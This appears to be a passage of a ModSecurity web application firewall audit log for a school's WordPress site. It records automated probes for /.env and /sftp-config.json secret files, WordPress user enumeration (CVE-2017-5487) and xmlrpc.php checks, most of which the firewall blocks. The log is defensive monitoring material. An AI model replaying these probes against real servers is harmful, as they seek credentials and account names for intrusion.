[rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746723475096515 5675 (- - -) Stopwatch2: 1746723475096515 5675; combined=4361, p1=557, p2=3576, p3=33, p4=37, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85bff50e-Z-- --c92f7375-A-- [09/May/2025:00:02:14 +0700] aBzjlis5rYyn3jlLjjImBgAAANQ 103.236.140.4 37402 103.236.140.4 8181 --c92f7375-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus Build/OPPS27.91-122-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36 Accept-Charset: utf-8 --c92f7375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c92f7375-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746723734655946 840 (- - -) Stopwatch2: 1746723734655946 840; combined=409, p1=370, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c92f7375-Z-- --42cef15d-A-- [09/May/2025:00:18:29 +0700] aBznZacs1DvJ_HgMHE94NgAAABg 103.236.140.4 48186 103.236.140.4 8181 --42cef15d-B-- GET /sftp-config.json HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 156.146.38.152 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 156.146.38.152 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --42cef15d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42cef15d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746724709940478 1253 (- - -) Stopwatch2: 1746724709940478 1253; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42cef15d-Z-- --de8fa147-A-- [09/May/2025:00:27:42 +0700] aBzpjis5rYyn3jlLjjIrBAAAANE 103.236.140.4 52650 103.236.140.4 8181 --de8fa147-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 79.139.57.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 79.139.57.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de8fa147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8fa147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746725262314481 2847 (- - -) Stopwatch2: 1746725262314481 2847; combined=1361, p1=395, p2=937, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8fa147-Z-- --d55ec074-A-- [09/May/2025:00:52:59 +0700] aBzve6cs1DvJ_HgMHE95YAAAAAk 103.236.140.4 52810 103.236.140.4 8181 --d55ec074-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d55ec074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d55ec074-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726779368280 3307 (- - -) Stopwatch2: 1746726779368280 3307; combined=1447, p1=461, p2=887, p3=0, p4=0, p5=99, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d55ec074-Z-- --aa44fb04-A-- [09/May/2025:00:53:02 +0700] aBzvfsP9GxxPAbCroFZCGgAAAEc 103.236.140.4 52814 103.236.140.4 8181 --aa44fb04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa44fb04-C-- demo.sayHello --aa44fb04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa44fb04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726782730623 5713 (- - -) Stopwatch2: 1746726782730623 5713; combined=4231, p1=574, p2=3434, p3=33, p4=35, p5=92, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa44fb04-Z-- --39f3fe42-A-- [09/May/2025:00:53:44 +0700] aBzvqKcs1DvJ_HgMHE95YwAAABQ 103.236.140.4 52818 103.236.140.4 8181 --39f3fe42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --39f3fe42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39f3fe42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726824772378 2991 (- - -) Stopwatch2: 1746726824772378 2991; combined=1350, p1=445, p2=874, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39f3fe42-Z-- --ed95d85c-A-- [09/May/2025:00:53:47 +0700] aBzvq6cs1DvJ_HgMHE95ZQAAABg 103.236.140.4 52822 103.236.140.4 8181 --ed95d85c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed95d85c-C-- demo.sayHello --ed95d85c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed95d85c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726827545992 4896 (- - -) Stopwatch2: 1746726827545992 4896; combined=3884, p1=468, p2=3214, p3=24, p4=24, p5=91, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed95d85c-Z-- --14fc3d0c-A-- [09/May/2025:00:53:47 +0700] aBzvqys5rYyn3jlLjjIrDwAAAMQ 103.236.140.4 52824 103.236.140.4 8181 --14fc3d0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --14fc3d0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14fc3d0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726827910898 2248 (- - -) Stopwatch2: 1746726827910898 2248; combined=1053, p1=378, p2=644, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14fc3d0c-Z-- --4125776c-A-- [09/May/2025:00:53:50 +0700] aBzvris5rYyn3jlLjjIrEAAAAMc 103.236.140.4 52830 103.236.140.4 8181 --4125776c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4125776c-C-- demo.sayHello --4125776c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4125776c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726830681989 4962 (- - -) Stopwatch2: 1746726830681989 4962; combined=3915, p1=482, p2=3239, p3=21, p4=25, p5=87, sr=80, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4125776c-Z-- --58b5870c-A-- [09/May/2025:00:54:36 +0700] aBzv3I4K347NtBcwXKx0vwAAAI8 103.236.140.4 52886 103.236.140.4 8181 --58b5870c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58b5870c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58b5870c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726876439601 2940 (- - -) Stopwatch2: 1746726876439601 2940; combined=1358, p1=446, p2=881, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58b5870c-Z-- --323b7e6a-A-- [09/May/2025:00:54:40 +0700] aBzv4MP9GxxPAbCroFZCHgAAAEk 103.236.140.4 52896 103.236.140.4 8181 --323b7e6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --323b7e6a-C-- demo.sayHello --323b7e6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --323b7e6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726880254330 6028 (- - -) Stopwatch2: 1746726880254330 6028; combined=4412, p1=555, p2=3623, p3=37, p4=37, p5=95, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --323b7e6a-Z-- --8ad4d54c-A-- [09/May/2025:00:57:44 +0700] aBzwmI4K347NtBcwXKx0wAAAAJg 103.236.140.4 53150 103.236.140.4 8181 --8ad4d54c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8ad4d54c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad4d54c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727064491685 2703 (- - -) Stopwatch2: 1746727064491685 2703; combined=1066, p1=376, p2=665, p3=0, p4=0, p5=24, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad4d54c-Z-- --47392a10-A-- [09/May/2025:00:57:47 +0700] aBzwmys5rYyn3jlLjjIrEgAAAMw 103.236.140.4 53158 103.236.140.4 8181 --47392a10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47392a10-C-- demo.sayHello --47392a10-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47392a10-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727067594925 6404 (- - -) Stopwatch2: 1746727067594925 6404; combined=4608, p1=655, p2=3711, p3=38, p4=42, p5=98, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47392a10-Z-- --295a1638-A-- [09/May/2025:00:58:00 +0700] aBzwqKcs1DvJ_HgMHE95cAAAAAI 103.236.140.4 53178 103.236.140.4 8181 --295a1638-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --295a1638-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --295a1638-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727080147402 3153 (- - -) Stopwatch2: 1746727080147402 3153; combined=1362, p1=436, p2=870, p3=0, p4=0, p5=55, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --295a1638-Z-- --b1b44873-A-- [09/May/2025:00:58:02 +0700] aBzwqqcs1DvJ_HgMHE95cQAAAAc 103.236.140.4 53184 103.236.140.4 8181 --b1b44873-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.103 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1b44873-C-- demo.sayHello --b1b44873-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1b44873-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727082884160 5594 (- - -) Stopwatch2: 1746727082884160 5594; combined=4138, p1=544, p2=3367, p3=34, p4=36, p5=94, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1b44873-Z-- --3ab33167-A-- [09/May/2025:01:01:21 +0700] aBzxcSs5rYyn3jlLjjIrFQAAAMA 103.236.140.4 53478 103.236.140.4 8181 --3ab33167-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ab33167-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ab33167-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727281282235 2921 (- - -) Stopwatch2: 1746727281282235 2921; combined=1328, p1=436, p2=862, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ab33167-Z-- --5cb81c60-A-- [09/May/2025:01:01:24 +0700] aBzxdKcs1DvJ_HgMHE95eAAAAA8 103.236.140.4 53482 103.236.140.4 8181 --5cb81c60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cb81c60-C-- demo.sayHello --5cb81c60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cb81c60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data 